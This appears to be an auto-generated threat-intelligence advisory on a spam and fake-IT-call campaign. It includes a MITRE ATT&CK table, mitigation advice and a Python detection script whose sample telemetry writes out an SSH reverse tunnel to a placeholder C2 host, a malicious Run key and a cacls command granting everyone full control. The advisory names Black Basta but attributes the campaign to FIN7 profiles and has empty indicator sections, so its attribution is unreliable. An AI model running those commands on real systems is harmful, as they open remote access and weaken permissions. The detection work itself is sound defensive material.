Black Basta is Bombarding Organisations with Fake Emails and Phone Calls

Tags: Spam, Emails, Phishing, Scam, Hack, Alert

Recently, a new cyber attack campaign called "Ongoing Campaign Bombards Enterprises with Spam Emails and Phone Calls" has been targeting organisations, attempting to steal information through fake emails and phone calls. The campaign is aggressive and ongoing, and aims to compromise organisational security and obtain sensitive data.

Indicators of Compromise


APT Groups

FIN7

Description of MISP: Groups targeting financial organizations or people with significant financial assets.

Description of Mitre: Carbanak is a threat group that mainly targets banks. It also refers to malware of the same name (Carbanak). It is sometimes referred to as FIN7, but these appear to be two groups using the same Carbanak malware and are therefore tracked separately. [1] [2]

Description of Etda: FIN7 is a financially motivated threat group that has primarily targeted the U.S. retail, restaurant, and hospitality sectors since mid-2015. They often use point-of-sale malware. A portion of FIN7 was run out of a front company called Combi Security. FIN7 is sometimes referred to as Carbanak or Anunak, but these appear to be two groups using the same Carbanak malware and are therefore tracked separately. The reported arrest was of the mastermind of Carbanak, not of FIN7; however, security research teams have continued to cite this arrest in reports on FIN7 activity since.

Aliases: Carbon Spider, Anunak, Navigator, CARBON SPIDER, Gold Niagara, G0046, Coreid, G0008, TAG-CR1, Gold Waterfall, ELBRUS, Calcium, ITG14, GOLD NIAGARA, Sangria Tempest, Carbanak, ATK32, APT-C-11, FIN7, ATK 32

Campaign Guidance

Remediation, mitigation, notes, history and related intelligence

RECOMMENDATIONS

Steps to Enhance Cybersecurity

In response to recent cyber attacks, the following steps are recommended to protect your organization:

1. Baseline Your Environment and Use Application Allowlisting

Evaluate your environment by baselining all installed remote monitoring and management (RMM) solutions. Use application allowlisting solutions such as AppLocker or Microsoft Defender Application Control to block the execution of all unapproved RMM solutions. For instance, the Quick Assist tool (quickassist.exe) can be blocked from executing via AppLocker. Additionally, block the domains associated with all unapproved RMM solutions. A public GitHub repository provides a catalog of RMM solutions, their binary names, and associated domains.

2. User Awareness and Communication Channels

Ensure that users know the established IT channels and communication methods within your organization, so they can recognize and prevent common social engineering attacks. Encourage users to report any suspicious phone calls and texts claiming to be from internal IT staff.

These steps will help your organization become more resilient against cyber attacks and enable users to identify and report suspicious activity effectively.

MITRE ATT&CK Techniques

Tactic | Technique | Procedure
--- | --- | ---
Denial of Service | T1498: Network Denial of Service | The threat actor overwhelms email protection solutions with spam.
Initial Access | T1566.004: Phishing: Spearphishing Voice | The threat actor calls impacted users and pretends to be a member of their organization's IT team to gain remote access.
Execution | T1059.003: Command and Scripting Interpreter: Windows Command Shell | The threat actor executes a batch script after establishing remote access to a user's asset.
Execution | T1059.001: Command and Scripting Interpreter: PowerShell | Batch scripts used by the threat actor execute certain commands via PowerShell.
Persistence | T1547.001: Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder | The threat actor creates a run key to execute a batch script via PowerShell, which then attempts to establish a reverse tunnel via SSH.
Defense Evasion | T1222.001: File and Directory Permissions Modification: Windows File and Directory Permissions Modification | The threat actor uses cacls.exe via a batch script to modify file permissions.
Defense Evasion | T1140: Deobfuscate/Decode Files or Information | The threat actor encrypted several zip archive payloads with the password "qaz123".
Credential Access | T1056.001: Input Capture: Keylogging | The threat actor runs a batch script that records the user's password via command line input.
Discovery | T1033: System Owner/User Discovery | The threat actor uses whoami.exe to evaluate whether the impacted user is an administrator.
Lateral Movement | T1570: Lateral Tool Transfer | Impacket was used to move payloads between compromised systems.
Command and Control | T1572: Protocol Tunneling | An SSH reverse tunnel is used to provide the threat actor with persistent remote access.
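As an added example (not part of the original advisory), a small Python rule set that flags the procedures in the table above over constructed endpoint telemetry: a Run key pointing at a batch script, ssh.exe started with a remote forward, cacls.exe changing ACLs and whoami.exe, and then requires several techniques on one host before it alerts. The Event fields, the sample events and the <C2-PLACEHOLDER> value are assumptions; the rules test each event against the technique rather than reproducing the actor's script.

```python
import re
from dataclasses import dataclass
@dataclass
class Event:
    host: str
    source: str   # "process" (a command line) or "registry" (a value write)
    image: str    # process image path, or registry key\value name
    detail: str   # command line, or registry value data

# Each rule: (ATT&CK technique id, description, predicate over an Event).
RULES = [
    ("T1547.001", "Run key pointing at a batch script",
     lambda e: e.source == "registry"
     and re.search(r"\\CurrentVersion\\Run\\", e.image, re.I)
     and re.search(r"\.(bat|cmd)\b", e.detail, re.I)),
    ("T1572", "ssh.exe started with a remote forward (-R): reverse tunnel",
     lambda e: e.source == "process" and e.image.lower().endswith("ssh.exe")
     and re.search(r"(^|\s)-R\s+\S+:", e.detail)),
    ("T1222.001", "cacls.exe granting, replacing, revoking or denying ACEs",
     lambda e: e.source == "process" and e.image.lower().endswith("cacls.exe")
     and re.search(r"\s/[gprd]\b", e.detail, re.I)),
    ("T1033", "whoami.exe run to check the user's privilege level",
     lambda e: e.source == "process" and e.image.lower().endswith("whoami.exe")),
]

def evaluate(events):
    """Return (host, technique id, description) for every event that matches a rule."""
    return [(e.host, tid, desc) for e in events for tid, desc, pred in RULES if pred(e)]

def hosts_with_chain(events, minimum=3):
    """Hosts where at least `minimum` distinct techniques fired; one lone whoami does not page."""
    seen = {}
    for host, tid, _ in evaluate(events):
        seen.setdefault(host, set()).add(tid)
    return sorted(h for h, t in seen.items() if len(t) >= minimum)

# Constructed sample telemetry; <C2-PLACEHOLDER> stands in for the actor's endpoint.
SAMPLE_EVENTS = [
    Event("ws01", "registry", r"HKCU\Software\Microsoft\Windows\CurrentVersion\Run\Updater",
          r"C:\Users\jdoe\AppData\Local\Temp\update.bat"),
    Event("ws01", "process", r"C:\Windows\System32\OpenSSH\ssh.exe",
          "ssh.exe -N -R 1234:localhost:3389 user@<C2-PLACEHOLDER>"),
    Event("ws01", "process", r"C:\Windows\System32\cacls.exe", r"cacls.exe C:\Temp\t /e /g everyone:f"),
    Event("ws01", "process", r"C:\Windows\System32\whoami.exe", "whoami /groups"),
    Event("ws02", "process", r"C:\Windows\System32\whoami.exe", "whoami"),
    Event("ws02", "process", r"C:\Windows\System32\notepad.exe", "notepad.exe notes.txt"),
]

if __name__ == "__main__":
    print(evaluate(SAMPLE_EVENTS), hosts_with_chain(SAMPLE_EVENTS))
```

Only ws01 reaches the chain threshold; the single whoami on ws02 is recorded but not escalated.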

Observed Countries (250)